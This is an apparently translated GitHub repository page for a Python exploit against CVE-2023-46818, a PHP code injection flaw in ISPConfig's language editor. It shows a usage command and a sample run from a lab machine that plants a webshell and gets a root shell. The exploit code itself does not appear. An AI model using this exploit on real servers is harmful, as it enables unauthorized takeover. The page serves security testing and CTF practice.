ajdumanhug/CVE-2023-46818

GitHub: ajdumanhug/CVE-2023-46818

针对 ISPConfig <= 3.2.11 的 PHP 代码注入漏洞的 Python3 利用脚本,可通过管理员凭证注入并执行任意 PHP 代码。

Stars: 15 | Forks: 2

# CVE-2023-46818 Python 漏洞利用脚本 ## 🔥 描述 此 Python 漏洞利用脚本针对 ISPConfig 中 `/admin/language_edit.php` 的 `records` POST 参数的安全漏洞,该参数未经过适当消毒处理。这允许已认证的管理员注入并执行任意 PHP 代码。 ## ⚠️ 受影响版本 3.2.11 及更早版本。 ## ⚙️ 使用方法 ``` python3 CVE-2023-46818.py ``` ## 💻 示例运行 ``` ┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal] └─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom [+] Logging in with username 'motoh4ck3r' and password 'broombroom' [+] Login successful! [*] Fetching CSRF tokens... [+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1 [+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8 [+] Injecting shell payload... [+] Shell written to: http://127.0.0.1:8081/admin/sh.php [+] Launching shell... ispconfig-shell# hostname & whoami & id nocturnal root uid=0(root) gid=0(root) groups=0(root) ispconfig-shell# ``` ## ℹ️ 参考资料 https://seclists.org/fulldisclosure/2023/Dec/2 ## ❤️ 致谢 感谢 Egidio Romano 发现此漏洞。
标签:CISA项目, CSRF, CVE-2023-46818, Exploit, HTB, ISPConfig, PHP代码注入, Python3, Webshell, Web安全, 后门, 命令执行, 威胁模拟, 安全漏洞, 蓝队分析, 认证利用